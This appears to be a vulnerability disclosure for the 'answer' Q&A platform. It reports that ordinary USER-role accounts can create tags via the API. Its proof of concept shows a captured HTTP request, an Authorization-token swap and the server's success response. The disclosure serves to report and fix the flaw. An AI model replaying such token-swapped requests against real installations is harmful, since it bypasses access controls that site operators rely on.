Description

It seems that the users with role ""USER" has no permission with creating tags, but we do not enforce it. Ohers operation, like edit and delete has no problem.

Proof of Concept

pull the latest docker and setup answer

1 create a user with name "normaluser", whose role is "USER"

2 admin create a tag

3 using burpsuit to hijack the requst, as below:

POST /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
Content-Length: 65
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/tags/create
Accept-Encoding: gzip, deflate
Connection: close
Authorization: fd201c60-1819-11ee-82d0-0242ac170002

{"display_name":"tag3","slug_name":"tag3","original_text":"tag3"}

4 replacing Authorization with normaluser's Authorization , and send the reqeust:

3 response can be like:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 01 Jul 2023 14:25:32 GMT
Content-Length: 81
Connection: close

{"code":200,"reason":"base.success","msg":"Success.","data":{"slug_name":"tag3"}}

Impact

privilege escape